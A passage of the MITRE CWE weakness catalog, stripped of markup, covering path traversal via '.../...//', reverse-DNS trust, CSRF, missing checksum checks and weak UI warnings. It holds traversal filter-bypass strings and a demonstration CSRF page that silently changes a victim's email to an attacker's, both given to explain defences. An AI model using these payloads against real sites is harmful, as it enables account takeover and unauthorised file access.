2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Relationships - - Untrusted Data Appended with Trusted Data - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The '.../...//' manipulation is useful for bypassing some path traversal protection schemes. If "../" is filtered in a sequential fashion, as done by some regular expression engines, then ".../...//" can collapse into the "../" unsafe value (CWE-182). Removing the first "../" yields "....//"; the second removal yields "../". Depending on the algorithm, the software could be susceptible to CWE-34 but not CWE-35, or vice versa. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2005-2169 - chain: ".../...//" bypasses protection mechanism using regexp's that remove "../" resulting in collapse into an unsafe value "../" (CWE-182) and resultant path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169 - - - CVE-2005-0202 - ".../....///" bypasses regexp's that remove "./" and "../" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202 - - - - - '.../...//' - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Doubled Triple Dot Slash - '.../...//' - - - - The software performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname. - - Since DNS names can be easily spoofed or misreported, and it may be difficult for the software to detect if a trusted DNS server has been compromised, DNS names do not constitute a valid authentication mechanism. - When the software performs a reverse DNS resolution for an IP address, if an attacker controls the server for that IP address, then the attacker can cause the server to return an arbitrary hostname. As a result, the attacker may be able to bypass authentication, cause the wrong hostname to be recorded in log files to hide activities, or perform other attacks. - Attackers can spoof DNS names by either (1) compromising a DNS server and modifying its records (sometimes called DNS cache poisoning), or (2) having legitimate control over a DNS server associated with their IP address. - - - - - - - - - - - - - Architecture and Design - - - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Malicious users can fake authentication information by providing false DNS information. - - - - - Architecture and Design - Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate. - - - Implementation - Perform proper forward and reverse DNS lookups to detect DNS spoofing. - - - - - The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. - - struct hostent *hp;struct in_addr myaddr;char* tHost = "trustme.example.com";myaddr.s_addr=inet_addr(ip_addr_string); - hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {trusted = true;} else {trusted = false;} - - - String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith("trustme.com")) {trusted = true;} - - - IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith("trustme.com")) {trusted = true;} - - IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. - - - In these examples, a connection is established if a request is made by a trusted host. - - sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) { - - memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);h=gethostbyname(inet_ntoa(cliAddr.sin_addr));if (h->h_name==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen); - } - - - while(true) { - DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress IPAddress = rp.getAddress();int port = rp.getPort();if ((rp.getHostName()==...) & (in==...)) { - - out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port);outSock.send(sp); - } - } - - These examples check if a request is from a trusted host before responding to a request, but the code only verifies the hostname as stored in the request packet. An attacker can spoof the hostname, thus impersonating a trusted client. - - - - - CVE-2001-1488 - Does not do double-reverse lookup to prevent DNS spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1488 - - - CVE-2001-1500 - Does not verify reverse-resolved hostnames in DNS. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1500 - - - CVE-2000-1221 - Authentication bypass using spoofed reverse-resolved DNS hostnames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1221 - - - CVE-2002-0804 - Authentication bypass using spoofed reverse-resolved DNS hostnames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0804 - - - CVE-2001-1155 - Filter does not properly check the result of a reverse DNS lookup, which could allow remote attackers to bypass intended access restrictions via DNS spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155 - - - CVE-2004-0892 - Reverse DNS lookup used to spoof trusted content in intermediary. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0892 - - - CVE-2003-0981 - Product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981 - - - - - Improperly Trusted Reverse DNS - - - Trusting self-reported DNS name - - - SFP29 - Faulty endpoint authentication - - - - - - - - - - - - - - - - CWE-350, CWE-247, and CWE-292 were merged into CWE-350 in CWE 2.5. CWE-247 was originally derived from Seven Pernicious Kingdoms, CWE-350 from PLOVER, and CWE-292 from CLASP. All taxonomies focused closely on the use of reverse DNS for authentication of incoming requests. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-06-23 - Critical - CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates. - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2014-02-18 - updated Description, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Improperly Trusted Reverse DNS - - - - The software does not properly distinguish between different types of elements in a way that leads to insecure behavior. - - - - - - - - - - Implementation - - - - - Other - Other - - - - - CVE-2005-2260 - Browser user interface does not distinguish between user-initiated and synthetic events. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2260 - - - CVE-2005-2801 - Product does not compare all required data in two separate elements, causing it to think they are the same, leading to loss of ACLs. Similar to Same Name error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801 - - - - - Insufficient Type Distinction - - - - Overlaps others, e.g. Multiple Interpretation Errors. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. - When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution. - - - - - - - - - - - - - - - Session Riding - - - Cross Site Reference Forgery - - - XSRF - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Confidentiality - Integrity - Availability - Non-Repudiation - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Read Application Data - Modify Application Data - DoS: Crash, Exit, or Restart - The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product's users. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim's privileges. - - - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual analysis can be useful for finding this weakness, and for minimizing false positives assuming an understanding of business logic. However, it might not achieve desired code coverage within limited time constraints. For black-box analysis, if credentials are not known for privileged accounts, then the most security-critical portions of the application may not receive sufficient attention. - Consider using OWASP CSRFTester to identify potential issues and aid in manual analysis. - - High - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Automated Static Analysis - CSRF is currently difficult to detect reliably using automated techniques. This is because each application has its own implicit security policy that dictates which requests can be influenced by an outsider and automatically performed on behalf of a user, versus which requests require strong confidence that the user intends to make the request. For example, a keyword search of the public portion of a web site is typically expected to be encoded within a link that can be launched automatically when the user clicks on the link. - Limited - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Web Application Scanner - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Fuzz Tester - Framework-based Fuzzer - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - - - SOAR Partial - - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, use anti-CSRF packages such as the OWASP CSRFGuard. [REF-330] - Another example is the ESAPI Session Management control, which includes a component for CSRF. [REF-45] - - - - Implementation - Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script. - - - Architecture and Design - Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [REF-332] - Note that this can be bypassed using XSS (CWE-79). - - - Architecture and Design - Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation. - Note that this can be bypassed using XSS (CWE-79). - - - Architecture and Design - - Use the "double-submitted cookie" method as described by Felten and Zeller: - When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user's machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same. - Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult. - This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [REF-331] - - Note that this can probably be bypassed using XSS (CWE-79), or when using web technologies that enable the attacker to read raw headers from HTTP requests. - - - Architecture and Design - Do not use the GET method for any request that triggers a state change. - - - Implementation - Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons. - Note that this can be bypassed using XSS (CWE-79). An attacker could use XSS to generate a spoofed Referer, or to generate a malicious request from a page whose Referer would be allowed. - - - - - This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user's web browser in which a valid session already exists. - The following HTML is intended to allow a user to update a profile. - - <form action="/url/profile.php" method="post"><input type="text" name="firstname"/><input type="text" name="lastname"/><br/><input type="text" name="email"/><input type="submit" name="submit" value="Update"/></form> - - profile.php contains the following code. - - // initiate the session in order to validate sessions - session_start(); - - //if the session is registered to a valid user then allow update - - if (! session_is_registered("username")) { - - echo "invalid session detected!"; - - // Redirect user to login page - [...] - exit; - } - - // The user session is valid, so process the request - - - // and update the information - - update_profile(); - function update_profile { - - - // read in the data from $POST and send an update - - - // to the database - SendUpdateToDatabase($_SESSION['username'], $_POST['email']);[...]echo "Your profile has been successfully updated."; - } - - This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images. - The attacker can then host code that will silently change the username and email address of any user that visits the page while remaining logged in to the target web application. The code might be an innocent-looking web page such as: - - <SCRIPT>function SendAttack () {form.email = "attacker@example.com"; - // send to profile.php - form.submit();}</SCRIPT> - <BODY onload="javascript:SendAttack();"> - <form action="http://victim.example.com/profile.php" id="form" method="post"><input type="hidden" name="firstname" value="Funny"><input type="hidden" name="lastname" value="Joke"><br/><input type="hidden" name="email"></form> - - Notice how the form contains hidden fields, so when it is loaded into the browser, the user will not notice it. Because SendAttack() is defined in the body's onload attribute, it will be automatically called when the victim loads the web page. - Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker's own address. At this stage, the user's identity has been compromised, and messages sent through this profile could be sent to the attacker's address. - - - - - CVE-2004-1703 - Add user accounts via a URL in an img tag - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1703 - - - CVE-2004-1995 - Add user accounts via a URL in an img tag - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1995 - - - CVE-2004-1967 - Arbitrary code execution by specifying the code in a crafted img tag or URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1967 - - - CVE-2004-1842 - Gain administrative privileges via a URL in an img tag - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1842 - - - CVE-2005-1947 - Delete a victim's information via a URL or an img tag - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1947 - - - CVE-2005-2059 - Change another user's settings via a URL or an img tag - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2059 - - - CVE-2005-1674 - Perform actions as administrator via a URL or an img tag - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1674 - - - CVE-2009-3520 - modify password for the administrator - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3520 - - - CVE-2009-3022 - CMS allows modification of configuration via CSRF attack against the administrator - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3022 - - - CVE-2009-3759 - web interface allows password changes or stopping a virtual machine via CSRF - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3759 - - - - - Cross-Site Request Forgery (CSRF) - - - A5 - Cross Site Request Forgery (CSRF) - Exact - - - 9 - Cross-site Request Forgery - - - - - - - - - - - - - - - - - - - - - - - There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user's profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause. - - - The CSRF topology is multi-channel: - - Attacker (as outsider) to intermediary (as user). The interaction point is either an external or internal channel. - Intermediary (as user) to server (as victim). The activation point is an internal channel. - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Description, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Theoretical_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - Tom Stracener - 2009-05-20 - Added demonstrative example for profile. - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Detection_Factors, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationship_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships, Theoretical_Notes - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - The software uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum. - If integrity check values or "checksums" are omitted from a protocol, there is no way of determining if data has been corrupted in transmission. The lack of checksum functionality in a protocol removes the first application-level check of data that can be used. The end-to-end philosophy of checks states that integrity checks should be performed at the lowest level that they can be completely implemented. Excluding further sanity checks and input validation performed by applications, the protocol's checksum is the most important level of checksum, since it can be performed more completely than at any previous level and takes into account entire messages, as opposed to single packets. - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Medium - - - Integrity - Other - Other - Data that is parsed and used may be corrupted. - - - Non-Repudiation - Other - Hide Activities - Other - Without a checksum it is impossible to determine if any changes have been made to the data after it was sent. - - - - - Architecture and Design - Add an appropriately sized checksum to the protocol, ensuring that data received may be simply validated before it is parsed and used. - - - Implementation - Ensure that the checksums present in the protocol design are properly implemented and added to each message before it is sent. - - - - - In this example, a request packet is received, and privileged information is sent to the requester: - - while(true) {DatagramPacket rp = new DatagramPacket(rData,rData.length);outSock.receive(rp);InetAddress IPAddress = rp.getAddress();int port = rp.getPort();out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out, out.length, IPAddress, port);outSock.send(sp);} - - The response containing secret data has no integrity check associated with it, allowing an attacker to alter the message without detection. - - - - - Failure to add integrity check value - - - - - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - Failure to Add Integrity Check Value - - - - The software does not validate or incorrectly validates the integrity check values or "checksums" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission. - Improper validation of checksums before use results in an unnecessary risk that can easily be mitigated. The protocol specification describes the algorithm used for calculating the checksum. It is then a simple matter of implementing the calculation and verifying that the calculated checksum and the received checksum match. Improper verification of the calculated checksum and the received checksum can lead to far greater consequences. - - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Integrity - Other - Modify Application Data - Other - Integrity checks usually use a secret key that helps authenticate the data origin. Skipping integrity checking generally opens up the possibility that new data from an invalid source can be injected. - - - Integrity - Other - Other - Data that is parsed and used may be corrupted. - - - Non-Repudiation - Other - Hide Activities - Other - Without a checksum check, it is impossible to determine if any changes have been made to the data after it was sent. - - - - - Implementation - Ensure that the checksums present in messages are properly checked in accordance with the protocol specification before they are parsed and used. - - - - - The following example demonstrates the weakness. - - sd = socket(AF_INET, SOCK_DGRAM, 0); serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) { - - memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen); - } - - - while(true) {DatagramPacket packet = new DatagramPacket(data,data.length,IPAddress, port);socket.send(sendPacket);} - - - - - - Failure to check integrity check value - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Failure to Check Integrity Check Value - - - - The software's user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system. - Software systems should warn users that a potentially dangerous action may occur if the user proceeds. For example, if the user downloads a file from an unknown source and attempts to execute the file on their machine, then the application's GUI can indicate that the file is unsafe. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Non-Repudiation - Hide Activities - - - - - CVE-1999-1055 - Product does not warn user when document contains certain dangerous functions or macros. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1055 - - - CVE-1999-0794 - Product does not warn user when document contains certain dangerous functions or macros. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0794 - - - CVE-2000-0277 - Product does not warn user when document contains certain dangerous functions or macros. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0277 - - - CVE-2000-0517 - Product does not warn user about a certificate if it has already been accepted for a different site. Possibly resultant. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0517 - - - CVE-2005-0602 - File extractor does not warn user it setuid/setgid files could be extracted. Overlaps privileges/permissions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0602 - - - CVE-2000-0342 - E-mail client allows bypass of warning for dangerous attachments via a Windows .LNK file that refers to the attachment. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342 - - - - - Product UI does not warn user of unsafe actions - - - - Often resultant, e.g. in unhandled error conditions. - Can overlap privilege errors, conceptually at least. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - - - The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Non-Repudiation - Hide Activities - - - - - CVE-2007-1099 - User not sufficiently warned if host key mismatch occurs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1099 - - - - - Insufficient UI warning of dangerous operations - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 